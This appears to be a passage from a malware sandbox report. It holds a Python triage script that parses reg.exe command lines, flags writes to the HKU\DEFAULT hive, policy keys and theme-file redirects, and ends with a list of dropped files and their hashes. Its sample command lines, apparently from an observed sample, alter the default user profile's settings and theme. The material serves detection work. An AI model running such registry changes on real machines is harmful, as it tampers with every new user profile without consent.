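    r'C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f',
    r'reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f',
    r'reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f',
    r'reg add "HKCU\Software\Contoso\App" /v Installed /t REG_DWORD /d 1 /f',  # benign contrast, constructed
    r'reg unload HKU\Default',
]

# Registry values whose data names a .theme file; a redirect here changes what a
# new profile loads at first logon.
THEME_VALUES = {"installtheme", "currenttheme", "themefile"}

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    out = []
    for m in TOKEN_RE.finditer(cmdline):
        out.append(m.group(1) if m.group(1) is not None else m.group(2))
    return out


@dataclass
class RegOp:
    verb: str           # add / load / unload / anything else reg.exe accepts
    key: str = ""
    value: str = ""     # /v
    vtype: str = ""     # /t
    data: str = ""      # /d
    force: bool = False  # /f


def parse_reg(cmdline):
    """Return a RegOp for a reg.exe invocation, or None if the line is not one."""
    toks = tokenize(cmdline)
    # Skip a leading "cmd.exe /c" wrapper (or any other prefix) up to the reg binary.
    while toks and toks[0].lower() not in ("reg", "reg.exe") and not toks[0].lower().endswith("\\reg.exe"):
        toks.pop(0)
    if len(toks) < 3:
        return None
    op = RegOp(verb=toks[1].lower(), key=toks[2])
    rest = toks[3:]
    i = 0
    while i < len(rest):
        t = rest[i].lower()
        if t == "/v" and i + 1 < len(rest):
            op.value = rest[i + 1]
            i += 2
        elif t == "/t" and i + 1 < len(rest):
            op.vtype = rest[i + 1]
            i += 2
        elif t == "/d" and i + 1 < len(rest):
            op.data = rest[i + 1]
            i += 2
        elif t == "/f":
            op.force = True
            i += 1
        else:
            i += 1
    return op


def triage(cmdlines):
    """Classify reg.exe command lines; return (findings, hives still loaded at the end)."""
    findings = {"default_hive_write": [], "policy_write": [], "theme_redirect": [], "hive_load": []}
    loaded = set()
    for line in cmdlines:
        op = parse_reg(line)
        if op is None:
            continue
        if op.verb == "load":
            loaded.add(op.key.upper())
            findings["hive_load"].append(op.key)
        elif op.verb == "unload":
            loaded.discard(op.key.upper())
        elif op.verb == "add":
            k = op.key.upper()
            # "HKU\DEFAULT\" (no dot) only exists after a reg load; ".DEFAULT" is not matched.
            if k.startswith("HKU\\DEFAULT\\") or k.startswith("HKEY_USERS\\DEFAULT\\"):
                findings["default_hive_write"].append(op.key + "\\" + op.value)
            if "\\SOFTWARE\\POLICIES\\" in k:
                findings["policy_write"].append(op.key + "\\" + op.value)
            if op.value.lower() in THEME_VALUES and op.data.lower().endswith(".theme"):
                findings["theme_redirect"].append(op.data)
    return findings, sorted(loaded)


if __name__ == "__main__":
    found, dangling = triage(SAMPLE_CMDLINES)
    for category, hits in found.items():
        for hit in hits:
            print(f"{category}: {hit}")
    print("hives left loaded:", dangling or "none")
```

The same parser runs unchanged over Sysmon Event ID 1 or 4688 command lines; the useful signal is the pairing of a reg load under an arbitrary HKU name with a burst of writes to it, since the individual values (HideFileExt, Hidden, TaskbarMn, a theme path) are ordinary user preferences when set under HKCU.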

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize 2KB
  MD5 d85ba6ff808d9e5444a4b369f5bc2730
  SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 cb5a7c84bb571c13878f3f50797f79cb
  SHA1 c42cf59af6b34ba84dbce8eb9d8760563473aa34
  SHA256 9a18c090421b64d07e3fdbc3e61beb26e8e827b8f5cd42cb6a7a3dd08fb3b947
  SHA512 646bbb5968ac16f975d67f630f7b47fe82779b6c9c9a472e1a40df294862fc60adc5d5cc12b01f34839ba1cd6ec15fc983c42a050e879346a4b683f1354b030b

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 944B
  MD5 a8e8360d573a4ff072dcc6f09d992c88
  SHA1 3446774433ceaf0b400073914facab11b98b6807
  SHA256 bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
  SHA512 4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 944B
  MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
  SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
  SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
  SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 c20ac38ae3022e305b8752804aadf486
  SHA1 4c144d6cfafb5c37ab4810ff3c1744df81493cdb
  SHA256 03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
  SHA512 c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 663B
  MD5 a8614a193d22a902e98728b2058ef931
  SHA1 b6cff2d21c7199c435a75eb81925d81e9950a6c2
  SHA256 dc525881a4bde1bdd97d5f86d6d9b7e280433dac86a7cb372561e21567935a14
  SHA512 bdc1c190a230eb04e9e7f5474cf055e2b62fc7c671b1b5bd27f0c55aeffc064e0e48c9428ad85608b2420e12646b4388ff5337826413af1ffc32e9d036418f33

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 796B
  MD5 7f8b53a986035930ca6cbedf83241248
  SHA1 b922174446409d908e1daed6a06eb919230f92c7
  SHA256 64be5a826411a6be75d1fb63a60c8e38634a31f4a8e3c6914ccc8dd1c9b7777c
  SHA512 46c32bf34e1d06caade3357591bd62e7e707f1d26b0b8f4da18c8e1d2f84459e4467b70d24c93fb06a31800167101dd31c44c320d94f251dd1131e0598d13cc5

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 055cd1930e45c3d77aa744d53bcc29d9
  SHA1 af1464daf329f36930b71fb33119c61a13472b6d
  SHA256 fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c
  SHA512 00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 98ca3263bd17f6f4308b8e4ff7530958
  SHA1 6f41bacd42af6a11bb8d1516f7b07171087e7a17
  SHA256 d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19
  SHA512 f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 08f9f3eb63ff567d1ee2a25e9bbf18f0
  SHA1 6bf06056d1bb14c183490caf950e29ac9d73643a
  SHA256 82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
  SHA512 425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 ba7bb8c22d72f7d6094bf4b7a11fd2df
  SHA1 e68eab39081c17997a16bca1667f1544f11804a5
  SHA256 0b479a9a243e4fa548d64277229f3c72cc7c6773001a235fc406c74e98d32b1a
  SHA512 58288cb73c35eb08b28f9ad0e96ed17e89b6e361c015c233deba9eb39a928e7216576c897bed531625171606ff9952361c40b14df27c0aa7e2e68228aeb0de4c

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 b6b62fabc50bfae977635bcebb14c566
  SHA1 653628f0db5229d9136ee897e92bedba3b1d91aa
  SHA256 bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be
  SHA512 9bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 400B
  MD5 2395435030954e996dda30cc02daebdd
  SHA1 6d4493185988373c6dc2411fea8bad6c9648fd4a
  SHA256 43e896907237944324de346cbc605dbc508f7a2c107c7f888f919e2d5cd046bc
  SHA512 f20d578d95805ef321a32230d6b249db0dd9261f4937e4dcf9706430d55d1b4088aa7fc9cc9878932b3f7a99b8afac30368c6002e348a1d1a25b4375572044fb

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkvnhyod.u4n.ps1
  Filesize 60B
  MD5 d17fe0a3f47be24a6453e9ef58c94641
  SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• memory/5008-11-0x000001B5EFB20000-0x000001B5EFB42000-memory.dmp
  Filesize 136KB

• memory/5296-156-0x00000196C9680000-0x00000196C969C000-memory.dmp
  Filesize 112KB